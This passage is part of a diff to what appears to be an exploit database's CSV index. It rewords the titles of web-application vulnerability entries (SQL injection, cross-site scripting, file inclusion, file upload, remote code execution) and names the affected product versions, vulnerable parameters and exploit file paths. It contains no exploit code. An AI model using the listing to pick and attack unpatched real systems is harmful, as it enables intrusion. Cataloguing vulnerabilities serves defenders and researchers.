- 'users.php' SQL Injection",2011-02-25,H3X,php,webapps,0 -35392,platforms/php/webapps/35392.txt,"WordPress Plugin IGIT Posts Slider Widget 1.0 - 'src' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0 -35393,platforms/php/webapps/35393.txt,"WordPress Plugin ComicPress Manager 1.4.9 - 'lang' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0 -35394,platforms/php/webapps/35394.txt,"WordPress Plugin YT-Audio 1.7 - 'v' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0 +35392,platforms/php/webapps/35392.txt,"WordPress Plugin IGIT Posts Slider Widget 1.0 - 'src' Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0 +35393,platforms/php/webapps/35393.txt,"WordPress Plugin ComicPress Manager 1.4.9 - 'lang' Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0 +35394,platforms/php/webapps/35394.txt,"WordPress Plugin YT-Audio 1.7 - 'v' Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0 35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerabilities",2014-11-28,"Parikesit _ Kurawa",php,webapps,0 -35397,platforms/php/webapps/35397.txt,"Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Parameter Cross-Site Scripting",2011-02-23,MustLive,php,webapps,0 +35397,platforms/php/webapps/35397.txt,"Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting",2011-02-23,MustLive,php,webapps,0 35400,platforms/php/webapps/35400.txt,"WordPress Plugin BackWPup 1.4 - Multiple Information Disclosure Vulnerabilities",2011-02-28,"Danilo Massa",php,webapps,0 -35401,platforms/php/webapps/35401.txt,"SnapProof - 'retPageID' Parameter Cross-Site Scripting",2011-02-28,"difficult 511",php,webapps,0 +35401,platforms/php/webapps/35401.txt,"SnapProof - 'retPageID' Cross-Site Scripting",2011-02-28,"difficult 511",php,webapps,0 35402,platforms/php/webapps/35402.txt,"Forritun - Multiple SQL Injections",2011-03-02,eXeSoul,php,webapps,0 -35405,platforms/php/webapps/35405.txt,"VidiScript - 'vp' Parameter Cross-Site Scripting",2011-03-02,NassRawI,php,webapps,0 +35405,platforms/php/webapps/35405.txt,"VidiScript - 'vp' Cross-Site Scripting",2011-03-02,NassRawI,php,webapps,0 35406,platforms/php/webapps/35406.txt,"Support Incident Tracker (SiT!) 3.62 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0 -35407,platforms/php/webapps/35407.txt,"phpWebSite 1.7.1 - 'local' Parameter Cross-Site Scripting",2011-03-03,"AutoSec Tools",php,webapps,0 +35407,platforms/php/webapps/35407.txt,"phpWebSite 1.7.1 - 'local' Cross-Site Scripting",2011-03-03,"AutoSec Tools",php,webapps,0 35408,platforms/php/webapps/35408.txt,"xtcModified 1.05 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0 35409,platforms/php/webapps/35409.txt,"Pragyan CMS 3.0 Beta - Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0 -35410,platforms/windows/webapps/35410.py,"InterPhoto Image Gallery 2.4.2 - 'IPLANG' Parameter Local File Inclusion",2011-03-04,"AutoSec Tools",windows,webapps,0 -35411,platforms/asp/webapps/35411.txt,"Kodak InSite 5.5.2 - Troubleshooting/DiagnosticReport.asp HeaderWarning Parameter Cross-Site Scripting",2011-03-07,Dionach,asp,webapps,0 -35412,platforms/asp/webapps/35412.txt,"Kodak InSite 5.5.2 - Pages/login.aspx Language Parameter Cross-Site Scripting",2011-03-07,Dionach,asp,webapps,0 +35410,platforms/windows/webapps/35410.py,"InterPhoto Image Gallery 2.4.2 - 'IPLANG' Local File Inclusion",2011-03-04,"AutoSec Tools",windows,webapps,0 +35411,platforms/asp/webapps/35411.txt,"Kodak InSite 5.5.2 - 'Troubleshooting/DiagnosticReport.asp?HeaderWarning' Cross-Site Scripting",2011-03-07,Dionach,asp,webapps,0 +35412,platforms/asp/webapps/35412.txt,"Kodak InSite 5.5.2 - 'Pages/login.aspx?Language' Cross-Site Scripting",2011-03-07,Dionach,asp,webapps,0 35416,platforms/php/webapps/35416.txt,"Interleave 5.5.0.2 - 'basicstats.php' Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0 35417,platforms/php/webapps/35417.php,"WS Interactive Automne 4.1 - 'admin/upload-controler.php' Arbitrary File Upload",2011-03-08,"AutoSec Tools",php,webapps,0 -35418,platforms/php/webapps/35418.txt,"WordPress Plugin Inline Gallery 0.3.9 - 'do' Parameter Cross-Site Scripting",2011-03-08,"High-Tech Bridge SA",php,webapps,0 +35418,platforms/php/webapps/35418.txt,"WordPress Plugin Inline Gallery 0.3.9 - 'do' Cross-Site Scripting",2011-03-08,"High-Tech Bridge SA",php,webapps,0 35419,platforms/hardware/webapps/35419.txt,"Prolink PRN2001 - Multiple Vulnerabilities",2014-12-02,"Herman Groeneveld",hardware,webapps,0 35424,platforms/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",php,webapps,0 36125,platforms/php/webapps/36125.txt,"Piwigo 2.7.3 - SQL Injection",2015-02-19,"Sven Schleier",php,webapps,80 35428,platforms/php/webapps/35428.txt,"SQL Buddy 1.3.3 - Remote Code Execution",2014-12-02,"Fady Mohammed Osman",php,webapps,0 -35429,platforms/php/webapps/35429.txt,"WordPress Plugin PhotoSmash Galleries 1.0.x - 'action' Parameter Cross-Site Scripting",2011-03-08,"High-Tech Bridge SA",php,webapps,0 +35429,platforms/php/webapps/35429.txt,"WordPress Plugin PhotoSmash Galleries 1.0.x - 'action' Cross-Site Scripting",2011-03-08,"High-Tech Bridge SA",php,webapps,0 35430,platforms/php/webapps/35430.txt,"WordPress Plugin 1 Flash Gallery 0.2.5 - Cross-Site Scripting / SQL Injection",2011-03-08,"High-Tech Bridge SA",php,webapps,0 35431,platforms/php/webapps/35431.txt,"Ruubikcms 1.0.3 - 'head.php' Cross-Site Scripting",2011-03-08,"Khashayar Fereidani",php,webapps,0 -35435,platforms/php/webapps/35435.txt,"WordPress Plugin Lazyest Gallery 1.0.26 - 'image' Parameter Cross-Site Scripting",2011-03-10,"High-Tech Bridge SA",php,webapps,0 +35435,platforms/php/webapps/35435.txt,"WordPress Plugin Lazyest Gallery 1.0.26 - 'image' Cross-Site Scripting",2011-03-10,"High-Tech Bridge SA",php,webapps,0 35436,platforms/php/webapps/35436.txt,"Xinha 0.96 - 'spell-check-savedicts.php' Multiple HTML Injection Vulnerabilities",2011-03-10,"John Leitch",php,webapps,0 35438,platforms/cgi/webapps/35438.txt,"Cosmoshop 10.05.00 - Multiple Cross-Site Scripting / SQL Injections",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0 35439,platforms/php/webapps/35439.txt,"WordPress Plugin Nextend Facebook Connect 1.4.59 - Cross-Site Scripting",2014-12-02,"Kacper Szurek",php,webapps,80 @@ -34873,13 +34874,13 @@ id,file,description,date,author,platform,type,port 35443,platforms/php/webapps/35443.txt,"TYPO3 Extension ke DomPDF - Remote Code Execution",2014-12-02,"RedTeam Pentesting",php,webapps,80 35444,platforms/php/webapps/35444.txt,"Lms Web Ensino - Multiple Input Validation Vulnerabilities",2011-03-04,waKKu,php,webapps,0 35447,platforms/php/webapps/35447.txt,"WordPress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps,0 -35451,platforms/php/webapps/35451.txt,"BoutikOne - categorie.php path Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 -35452,platforms/php/webapps/35452.txt,"BoutikOne - list.php path Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 -35453,platforms/php/webapps/35453.txt,"BoutikOne - 'search.php' Multiple Parameter SQL Injections",2011-03-14,cdx.security,php,webapps,0 -35454,platforms/php/webapps/35454.txt,"BoutikOne - rss_news.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 -35455,platforms/php/webapps/35455.txt,"BoutikOne - rss_flash.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 -35456,platforms/php/webapps/35456.txt,"BoutikOne - rss_promo.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 -35457,platforms/php/webapps/35457.txt,"BoutikOne - rss_top10.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 +35451,platforms/php/webapps/35451.txt,"BoutikOne - 'categorie.php?path' SQL Injection",2011-03-14,cdx.security,php,webapps,0 +35452,platforms/php/webapps/35452.txt,"BoutikOne - 'list.php?path' SQL Injection",2011-03-14,cdx.security,php,webapps,0 +35453,platforms/php/webapps/35453.txt,"BoutikOne - 'search.php' Multiple SQL Injections",2011-03-14,cdx.security,php,webapps,0 +35454,platforms/php/webapps/35454.txt,"BoutikOne - 'rss_news.php?lang' SQL Injection",2011-03-14,cdx.security,php,webapps,0 +35455,platforms/php/webapps/35455.txt,"BoutikOne - 'rss_flash.php?lang' SQL Injection",2011-03-14,cdx.security,php,webapps,0 +35456,platforms/php/webapps/35456.txt,"BoutikOne - 'rss_promo.php?lang' SQL Injection",2011-03-14,cdx.security,php,webapps,0 +35457,platforms/php/webapps/35457.txt,"BoutikOne - 'rss_top10.php?lang' SQL Injection",2011-03-14,cdx.security,php,webapps,0 35459,platforms/php/webapps/35459.txt,"WordPress Plugin Cart66 Lite eCommerce 1.5.1.17 - Blind SQL Injection",2014-12-03,"Kacper Szurek",php,webapps,80 35460,platforms/php/webapps/35460.txt,"WordPress Plugin CodeArt Google MP3 Player - File Disclosure Download",2014-12-03,"QK14 Team",php,webapps,80 35564,platforms/php/webapps/35564.txt,"DoceboLms 4.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-03,LiquidWorm,php,webapps,0 @@ -34893,10 +34894,10 @@ id,file,description,date,author,platform,type,port 35475,platforms/php/webapps/35475.txt,"WordPress Plugin Sodahead Polls 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-17,"High-Tech Bridge SA",php,webapps,0 35476,platforms/php/webapps/35476.txt,"WordPress Plugin Rating-Widget 1.3.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-17,"Todor Donev",php,webapps,0 35477,platforms/php/webapps/35477.txt,"XOOPS 2.x - Multiple Cross-Site Scripting Vulnerabilities",2011-03-18,"Aung Khant",php,webapps,0 -35479,platforms/php/webapps/35479.txt,"Web Poll Pro 1.0.3 - 'error' Parameter HTML Injection",2011-03-19,Hector.x90,php,webapps,0 -35480,platforms/php/webapps/35480.txt,"Online store PHP script - Multiple Cross-Site Scripting / SQL Injection",2011-03-21,"kurdish hackers team",php,webapps,0 +35479,platforms/php/webapps/35479.txt,"Web Poll Pro 1.0.3 - 'error' HTML Injection",2011-03-19,Hector.x90,php,webapps,0 +35480,platforms/php/webapps/35480.txt,"Online store PHP script - Multiple Cross-Site Scripting / SQL Injections",2011-03-21,"kurdish hackers team",php,webapps,0 35481,platforms/php/webapps/35481.txt,"Newsportal 0.37 - 'post.php' Cross-Site Scripting",2011-03-21,"kurdish hackers team",php,webapps,0 -35482,platforms/php/webapps/35482.txt,"PluggedOut Blog 1.9.9 - 'year' Parameter Cross-Site Scripting",2011-03-21,"kurdish hackers team",php,webapps,0 +35482,platforms/php/webapps/35482.txt,"PluggedOut Blog 1.9.9 - 'year' Cross-Site Scripting",2011-03-21,"kurdish hackers team",php,webapps,0 35490,platforms/php/webapps/35490.txt,"IceHrm 7.1 - Multiple Vulnerabilities",2014-12-08,LiquidWorm,php,webapps,0 35492,platforms/php/webapps/35492.txt,"Free Article Submissions 1.0 - SQL Injection",2014-12-08,BarrabravaZ,php,webapps,0 35493,platforms/php/webapps/35493.txt,"WordPress Plugin Ajax Store Locator 1.2 - Arbitrary File Download",2014-12-08,"Claudio Viviani",php,webapps,0 @@ -34904,11 +34905,11 @@ id,file,description,date,author,platform,type,port 35496,platforms/php/webapps/35496.txt,"MC Content Manager 10.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-24,MustLive,php,webapps,0 35497,platforms/php/webapps/35497.txt,"GrapeCity Data Dynamics Reports 1.6.2084.14 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-24,Dionach,php,webapps,0 35498,platforms/php/webapps/35498.txt,"Ripe Website Manager 1.1 - Cross-Site Scripting / Multiple SQL Injections",2011-03-24,"High-Tech Bridge SA",php,webapps,0 -35499,platforms/php/webapps/35499.txt,"netjukebox 4.01B/5.25 - 'skin' Parameter Cross-Site Scripting",2011-03-24,"AutoSec Tools",php,webapps,0 -35500,platforms/php/webapps/35500.txt,"Family Connections 2.3.2 - 'subject' Parameter HTML Injection",2011-03-25,"Zero Science Lab",php,webapps,0 +35499,platforms/php/webapps/35499.txt,"netjukebox 4.01B/5.25 - 'skin' Cross-Site Scripting",2011-03-24,"AutoSec Tools",php,webapps,0 +35500,platforms/php/webapps/35500.txt,"Family Connections 2.3.2 - 'subject' HTML Injection",2011-03-25,"Zero Science Lab",php,webapps,0 35672,platforms/jsp/webapps/35672.txt,"Cisco Unified Communications Manager 8.5 - 'xmldirectorylist.jsp' Multiple SQL Injections",2011-04-27,"Alberto Revelli",jsp,webapps,0 35673,platforms/php/webapps/35673.txt,"WordPress Plugin Daily Maui Photo Widget 0.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-28,"High-Tech Bridge SA",php,webapps,0 -35674,platforms/php/webapps/35674.txt,"WordPress Plugin WP Photo Album 1.5.1 - 'id' Parameter Cross-Site Scripting",2011-04-28,"High-Tech Bridge SA",php,webapps,0 +35674,platforms/php/webapps/35674.txt,"WordPress Plugin WP Photo Album 1.5.1 - 'id' Cross-Site Scripting",2011-04-28,"High-Tech Bridge SA",php,webapps,0 35675,platforms/php/webapps/35675.txt,"Kusaba X 0.9 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-27,"Emilio Pinna",php,webapps,0 35676,platforms/cgi/webapps/35676.txt,"BackupPC 3.x - 'index.cgi' Multiple Cross-Site Scripting Vulnerabilities",2011-04-28,"High-Tech Bridge SA",cgi,webapps,0 35505,platforms/php/webapps/35505.txt,"WordPress Plugin Symposium 14.10 - SQL Injection",2014-12-09,"Kacper Szurek",php,webapps,0 @@ -34920,30 +34921,30 @@ id,file,description,date,author,platform,type,port 35559,platforms/php/webapps/35559.txt,"MyBB 1.4/1.6 - Multiple Vulnerabilities",2011-04-04,MustLive,php,webapps,0 35514,platforms/php/webapps/35514.txt,"OrangeHRM 2.6.2 - 'jobVacancy.php' Cross-Site Scripting",2011-03-27,"AutoSec Tools",php,webapps,0 35515,platforms/php/webapps/35515.txt,"Alkacon OpenCMS 7.5.x - Multiple Cross-Site Scripting Vulnerabilities",2011-03-28,antisnatchor,php,webapps,0 -35516,platforms/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 - 'DOCUMENT_ROOT' Parameter Local File Inclusion",2011-03-28,eidelweiss,php,webapps,0 -35557,platforms/php/webapps/35557.txt,"PHP-Fusion - 'article_id' Parameter SQL Injection",2011-04-04,KedAns-Dz,php,webapps,0 +35516,platforms/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 - 'DOCUMENT_ROOT' Local File Inclusion",2011-03-28,eidelweiss,php,webapps,0 +35557,platforms/php/webapps/35557.txt,"PHP-Fusion - 'article_id' SQL Injection",2011-04-04,KedAns-Dz,php,webapps,0 35520,platforms/php/webapps/35520.txt,"Claroline 1.10 - Multiple HTML Injection Vulnerabilities",2011-03-28,"AutoSec Tools",php,webapps,0 -35521,platforms/php/webapps/35521.txt,"osCSS 2.1 - Cross-Site Scripting / Multiple Local File Inclusion",2011-03-29,"AutoSec Tools",php,webapps,0 +35521,platforms/php/webapps/35521.txt,"osCSS 2.1 - Multiple Cross-Site Scripting / Local File Inclusions",2011-03-29,"AutoSec Tools",php,webapps,0 35522,platforms/php/webapps/35522.txt,"Spitfire 1.0.3x - 'cms_username' Cross-Site Scripting",2011-03-29,"High-Tech Bridge SA",php,webapps,0 35523,platforms/php/webapps/35523.txt,"Tracks 1.7.2 - URI Cross-Site Scripting",2011-03-29,"Mesut Timur",php,webapps,0 35524,platforms/php/webapps/35524.txt,"XOOPS - 'view_photos.php' Cross-Site Scripting",2011-03-29,KedAns-Dz,php,webapps,0 -35525,platforms/php/webapps/35525.txt,"GuppY 4.6.14 - 'lng' Parameter Multiple SQL Injections",2011-03-30,"kurdish hackers team",php,webapps,0 +35525,platforms/php/webapps/35525.txt,"GuppY 4.6.14 - 'lng' Multiple SQL Injections",2011-03-30,"kurdish hackers team",php,webapps,0 35526,platforms/php/webapps/35526.txt,"YaCOMAS 0.3.6 OpenCMS - Multiple Cross-Site Scripting Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps,0 35528,platforms/php/webapps/35528.txt,"GLPI 0.85 - Blind SQL Injection",2014-12-15,"Kacper Szurek",php,webapps,0 35529,platforms/windows/webapps/35529.txt,"Soitec SmartEnergy 1.4 - SCADA Login SQL Injection / Authentication Bypass",2014-12-15,LiquidWorm,windows,webapps,0 35533,platforms/php/webapps/35533.py,"WordPress Plugin Download Manager 2.7.4 - Remote Code Execution",2014-12-15,"Claudio Viviani",php,webapps,0 -35548,platforms/php/webapps/35548.txt,"InTerra Blog Machine 1.84 - 'subject' Parameter HTML Injection",2011-03-31,"High-Tech Bridge SA",php,webapps,0 +35548,platforms/php/webapps/35548.txt,"InTerra Blog Machine 1.84 - 'subject' HTML Injection",2011-03-31,"High-Tech Bridge SA",php,webapps,0 35535,platforms/php/webapps/35535.php,"PHPads 213607 - Authentication Bypass / Password Change Exploit",2014-12-15,"Shaker msallm",php,webapps,0 -35561,platforms/php/webapps/35561.txt,"WordPress Plugin WPwizz AdWizz Plugin 1.0 - 'link' Parameter Cross-Site Scripting",2011-04-04,"John Leitch",php,webapps,0 -35562,platforms/php/webapps/35562.txt,"WordPress Plugin Placester 0.1 - 'ajax_action' Parameter Cross-Site Scripting",2011-04-03,"John Leitch",php,webapps,0 +35561,platforms/php/webapps/35561.txt,"WordPress Plugin WPwizz AdWizz Plugin 1.0 - 'link' Cross-Site Scripting",2011-04-04,"John Leitch",php,webapps,0 +35562,platforms/php/webapps/35562.txt,"WordPress Plugin Placester 0.1 - 'ajax_action' Cross-Site Scripting",2011-04-03,"John Leitch",php,webapps,0 35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - Cross-Site Scripting / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0 35556,platforms/hardware/webapps/35556.txt,"CIK Telecom VoIP Router SVG6000RW - Privilege Escalation / Command Execution",2014-12-17,Chako,hardware,webapps,0 35543,platforms/php/webapps/35543.txt,"WordPress Plugin WP Symposium 14.11 - Unauthenticated Arbitrary File Upload",2014-12-15,"Claudio Viviani",php,webapps,0 -35547,platforms/php/webapps/35547.txt,"ICJobSite 1.1 - 'pid' Parameter SQL Injection",2011-03-30,RoAd_KiLlEr,php,webapps,0 +35547,platforms/php/webapps/35547.txt,"ICJobSite 1.1 - 'pid' SQL Injection",2011-03-30,RoAd_KiLlEr,php,webapps,0 35550,platforms/php/webapps/35550.txt,"Collabtive 0.6.5 - Multiple Remote Input Validation Vulnerabilities",2011-03-31,"High-Tech Bridge SA",php,webapps,0 35551,platforms/php/webapps/35551.txt,"CMS Papoo 6.0.0 Rev. 4701 - Persistent Cross-Site Scripting",2014-12-16,"Steffen Rösemann",php,webapps,80 35555,platforms/php/webapps/35555.txt,"AWCM 2.x - 'search.php' Cross-Site Scripting",2011-04-01,"Antu Sanadi",php,webapps,0 -35569,platforms/php/webapps/35569.txt,"XOOPS 2.5 - 'banners.php' Multiple Local File Inclusion",2011-04-04,KedAns-Dz,php,webapps,0 +35569,platforms/php/webapps/35569.txt,"XOOPS 2.5 - 'banners.php' Multiple Local File Inclusions",2011-04-04,KedAns-Dz,php,webapps,0 35571,platforms/php/webapps/35571.txt,"TextPattern 4.2 - 'index.php' Cross-Site Scripting",2011-04-06,"kurdish hackers team",php,webapps,0 35572,platforms/php/webapps/35572.txt,"Redmine 1.0.1/1.1.1 - 'projects/hg-hellowword/news/' Cross-Site Scripting",2011-04-06,"Mesut Timur",php,webapps,0 35574,platforms/php/webapps/35574.txt,"vTiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Inclusion",2011-04-08,"John Leitch",php,webapps,0 @@ -34957,61 +34958,61 @@ id,file,description,date,author,platform,type,port 35584,platforms/php/webapps/35584.txt,"GQ File Manager 0.2.5 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35585,platforms/php/webapps/35585.txt,"Codiad 2.4.3 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35588,platforms/php/webapps/35588.rb,"Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion / Remote Code Execution (Metasploit)",2014-12-22,"Patrick Webster",php,webapps,9000 -35591,platforms/php/webapps/35591.txt,"PHPMyRecipes 1.2.2 - 'browse.php category' Parameter SQL Injection",2014-12-23,"Manish Tanwar",php,webapps,80 +35591,platforms/php/webapps/35591.txt,"PHPMyRecipes 1.2.2 - 'browse.php?category' SQL Injection",2014-12-23,"Manish Tanwar",php,webapps,80 35593,platforms/windows/webapps/35593.txt,"SysAid Server - Arbitrary File Disclosure",2014-12-23,"Bernhard Mueller",windows,webapps,0 35594,platforms/jsp/webapps/35594.txt,"NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities",2014-12-23,"SEC Consult",jsp,webapps,8443 35596,platforms/php/webapps/35596.txt,"eGroupWare 1.8.1 - 'test.php' Cross-Site Scripting",2011-04-07,"AutoSec Tools",php,webapps,0 35598,platforms/php/webapps/35598.txt,"1024 CMS 1.1.0 Beta - Multiple Input Validation Vulnerabilities",2011-04-08,"QSecure and Demetris Papapetrou",php,webapps,0 35599,platforms/asp/webapps/35599.txt,"Dimac CMS 1.3 XS - 'default.asp' SQL Injection",2011-04-11,KedAns-Dz,asp,webapps,0 -35601,platforms/php/webapps/35601.txt,"Etki Video PRO 2.0 - izle.asp id Parameter SQL Injection",2011-04-11,Kurd-Team,php,webapps,0 -35602,platforms/php/webapps/35602.txt,"Etki Video PRO 2.0 - kategori.asp cat Parameter SQL Injection",2011-04-11,Kurd-Team,php,webapps,0 +35601,platforms/php/webapps/35601.txt,"Etki Video PRO 2.0 - 'izle.asp?id' SQL Injection",2011-04-11,Kurd-Team,php,webapps,0 +35602,platforms/php/webapps/35602.txt,"Etki Video PRO 2.0 - 'kategori.asp?cat' SQL Injection",2011-04-11,Kurd-Team,php,webapps,0 35603,platforms/php/webapps/35603.txt,"WordPress Theme Live Wire 2.3.1 - Multiple Vulnerabilities",2011-04-11,MustLive,php,webapps,0 -35604,platforms/php/webapps/35604.txt,"eForum 1.1 - '/eforum.php' Arbitrary File Upload",2011-04-09,QSecure,php,webapps,0 +35604,platforms/php/webapps/35604.txt,"eForum 1.1 - 'eforum.php' Arbitrary File Upload",2011-04-09,QSecure,php,webapps,0 35605,platforms/php/webapps/35605.txt,"Lazarus Guestbook 1.22 - Multiple Vulnerabilities",2014-12-24,TaurusOmar,php,webapps,80 35607,platforms/php/webapps/35607.txt,"WordPress Plugin Spellchecker 3.1 - 'general.php' Local/Remote File Inclusion",2011-04-12,"Dr Trojan",php,webapps,0 35608,platforms/php/webapps/35608.txt,"WordPress Theme The Gazette Edition 2.9.4 - Multiple Vulnerabilities",2011-04-12,MustLive,php,webapps,0 -35610,platforms/php/webapps/35610.txt,"Plogger 1.0 RC1 - 'gallery_name' Parameter Cross-Site Scripting",2011-04-12,"High-Tech Bridge SA",php,webapps,0 +35610,platforms/php/webapps/35610.txt,"Plogger 1.0 RC1 - 'gallery_name' Cross-Site Scripting",2011-04-12,"High-Tech Bridge SA",php,webapps,0 35611,platforms/php/webapps/35611.txt,"Website Baker 2.8.1 - Multiple SQL Injections",2011-04-12,"High-Tech Bridge SA",php,webapps,0 -35615,platforms/php/webapps/35615.txt,"PhpAlbum.net 0.4.1-14_fix06 - 'var3' Parameter Remote Command Execution",2011-04-14,"High-Tech Bridge SA",php,webapps,0 +35615,platforms/php/webapps/35615.txt,"PhpAlbum.net 0.4.1-14_fix06 - 'var3' Remote Command Execution",2011-04-14,"High-Tech Bridge SA",php,webapps,0 35616,platforms/php/webapps/35616.txt,"Agahi Advertisement CMS 4.0 - 'view_ad.php' SQL Injection",2011-04-15,"Sepehr Security Team",php,webapps,0 -35617,platforms/php/webapps/35617.txt,"Qianbo Enterprise Web Site Management System - 'Keyword' Parameter Cross-Site Scripting",2011-04-14,d3c0der,php,webapps,0 -35618,platforms/php/webapps/35618.txt,"RunCMS Module Partners - 'id' Parameter SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0 +35617,platforms/php/webapps/35617.txt,"Qianbo Enterprise Web Site Management System - 'Keyword' Cross-Site Scripting",2011-04-14,d3c0der,php,webapps,0 +35618,platforms/php/webapps/35618.txt,"RunCMS Module Partners - 'id' SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0 35619,platforms/php/webapps/35619.txt,"PhoenixCMS 1.7 - Local File Inclusion / SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0 35621,platforms/php/webapps/35621.txt,"4Images 1.7.9 - Multiple Remote File Inclusions / SQL Injections",2011-04-16,KedAns-Dz,php,webapps,0 35623,platforms/multiple/webapps/35623.txt,"Pimcore CMS 2.3.0/3.0 - SQL Injection",2014-12-27,Vulnerability-Lab,multiple,webapps,0 35624,platforms/php/webapps/35624.txt,"phpList 3.0.6/3.0.10 - SQL Injection",2014-12-27,Vulnerability-Lab,php,webapps,0 35625,platforms/php/webapps/35625.txt,"PMB 4.1.3 - Authenticated SQL Injection",2014-12-27,"xd4rker dark",php,webapps,0 35626,platforms/php/webapps/35626.txt,"Easy File Sharing Web Server 6.8 - Persistent Cross-Site Scripting",2014-12-27,"Sick Psycko",php,webapps,0 -35629,platforms/php/webapps/35629.txt,"ChillyCMS 1.2.1 - Multiple Remote File Inclusion",2011-04-16,KedAns-Dz,php,webapps,0 +35629,platforms/php/webapps/35629.txt,"ChillyCMS 1.2.1 - Multiple Remote File Inclusions",2011-04-16,KedAns-Dz,php,webapps,0 35630,platforms/php/webapps/35630.txt,"Joomla! Component com_phocadownload - Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0 35631,platforms/php/webapps/35631.txt,"CRESUS - 'recette_detail.php' SQL Injection",2011-04-19,"GrayHatz Security Group",php,webapps,0 35632,platforms/php/webapps/35632.txt,"XOOPS 2.5 - 'imagemanager.php' Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0 35633,platforms/php/webapps/35633.txt,"Ultra Marketing Enterprises CMS and Cart - Multiple SQL Injections",2011-04-19,eXeSoul,php,webapps,0 -35634,platforms/php/webapps/35634.txt,"WordPress Plugin WP-StarsRateBox 1.1 - 'j' Parameter SQL Injection",2011-04-19,"High-Tech Bridge SA",php,webapps,0 +35634,platforms/php/webapps/35634.txt,"WordPress Plugin WP-StarsRateBox 1.1 - 'j' SQL Injection",2011-04-19,"High-Tech Bridge SA",php,webapps,0 35635,platforms/php/webapps/35635.txt,"Dalbum 1.43 - 'editini.php' Cross-Site Scripting",2011-04-19,"High-Tech Bridge SA",php,webapps,0 35636,platforms/php/webapps/35636.txt,"ChatLakTurk PHP Botlu Video - 'ara.php' Cross-Site Scripting",2011-04-19,"kurdish hackers team",php,webapps,0 35643,platforms/php/webapps/35643.txt,"webSPELL 4.2.2a - Multiple Cross-Site Scripting Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0 35659,platforms/php/webapps/35659.txt,"Social Microblogging PRO 1.5 - Persistent Cross-Site Scripting",2014-12-31,"Halil Dalabasmaz",php,webapps,80 -35645,platforms/php/webapps/35645.txt,"Automagick Tube Script 1.4.4 - 'module' Parameter Cross-Site Scripting",2011-04-20,Kurd-Team,php,webapps,0 -35647,platforms/php/webapps/35647.txt,"SyCtel Design - 'menu' Parameter Multiple Local File Inclusion",2011-04-21,"Ashiyane Digital Security Team",php,webapps,0 -35648,platforms/php/webapps/35648.txt,"ZenPhoto 1.4.0.3 - '_zp_themeroot' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-04-21,"High-Tech Bridge SA",php,webapps,0 -35649,platforms/php/webapps/35649.txt,"todoyu 2.0.8 - 'lang' Parameter Cross-Site Scripting",2011-04-22,"AutoSec Tools",php,webapps,0 +35645,platforms/php/webapps/35645.txt,"Automagick Tube Script 1.4.4 - 'module' Cross-Site Scripting",2011-04-20,Kurd-Team,php,webapps,0 +35647,platforms/php/webapps/35647.txt,"SyCtel Design - 'menu' Multiple Local File Inclusions",2011-04-21,"Ashiyane Digital Security Team",php,webapps,0 +35648,platforms/php/webapps/35648.txt,"ZenPhoto 1.4.0.3 - '_zp_themeroot' Multiple Cross-Site Scripting Vulnerabilities",2011-04-21,"High-Tech Bridge SA",php,webapps,0 +35649,platforms/php/webapps/35649.txt,"todoyu 2.0.8 - 'lang' Cross-Site Scripting",2011-04-22,"AutoSec Tools",php,webapps,0 35650,platforms/php/webapps/35650.py,"LightNEasy 3.2.3 - 'userhandle' Cookie Parameter SQL Injection",2011-04-21,"AutoSec Tools",php,webapps,0 35651,platforms/php/webapps/35651.txt,"Dolibarr CMS 3.0 - Local File Inclusion / Cross-Site Scripting",2011-04-22,"AutoSec Tools",php,webapps,0 35657,platforms/php/webapps/35657.php,"WordPress Plugin Sermon Browser 0.43 - 